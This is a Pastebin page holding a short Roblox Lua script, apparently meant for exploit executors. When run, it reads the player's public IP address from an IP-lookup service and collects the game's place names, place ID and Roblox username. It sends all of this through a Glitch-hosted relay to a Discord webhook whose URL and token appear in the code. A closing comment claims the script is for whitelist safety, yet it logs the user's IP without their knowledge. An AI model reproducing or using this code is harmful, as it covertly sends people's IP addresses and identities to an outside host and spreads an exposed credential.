TheGamer1

Untitled

May 24th, 2019
121
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.58 KB | None | 0 0
  1. local webhook = "https://discordapp.com/api/webhooks/581459197527588885/dsEwCGtuhzdY3bqkek6VUa2hcIGDijO4lzoq6ucALOatL-Hzv_wK9Jz86RKsh5PN60mG"
  2. -- Webhook Above
  3. local api = "https://api.ipify.org"
  4. local message = "`".." Script Has Been Used: ~ "..game:HttpGet(api, true).. "`"
  5. local pages = game:GetService("AssetService"):GetGamePlacesAsync()
  6. for _,place in pairs(pages:GetCurrentPage()) do
  7. local message3 = "Place Name Is: ".. place.Name
  8. local message2 = "`".."The game id is: "..game.PlaceId.."`".." + roblox username: ".. game:GetService("Players").LocalPlayer.Name
  9. local botname = "Use Bot" -- Name Here!
  10. local HttpService = game:GetService("HttpService");
  11.  
  12. function specials(Webhook, Message, Botname)
  13. local Name;
  14. local start = game:HttpGet("http://buritoman69.glitch.me");
  15. local biggie = "http://buritoman69.glitch.me/webhook";
  16. if (not Message or Message == "" or not Botname) then
  17. Name = "GameBot"
  18. return error("nil or empty message!")
  19. else
  20. Name = Botname;
  21. end
  22. local Body = {
  23. ['Key'] = tostring("applesaregood"),
  24. ['Message'] = tostring(Message),
  25. ['Name'] = Name,
  26. ['Webhook'] = Webhook
  27. }
  28. Body = HttpService:JSONEncode(Body);
  29. local Data = game:HttpPost(biggie, Body, false, "application/json")
  30. return Data or nil;
  31. end
  32.  
  33. specials(webhook, message, botname)
  34. specials(webhook, message2, botname)
  35. specials(webhook, message3, botname)
  36. end
  37.  
  38. --[[ Please Don't Use This Script To Log Innocent People Or Use Their Ips As A Bait, Its Just For Making Your Whitelists Safer. ]]
Add Comment
Please, Sign In to add comment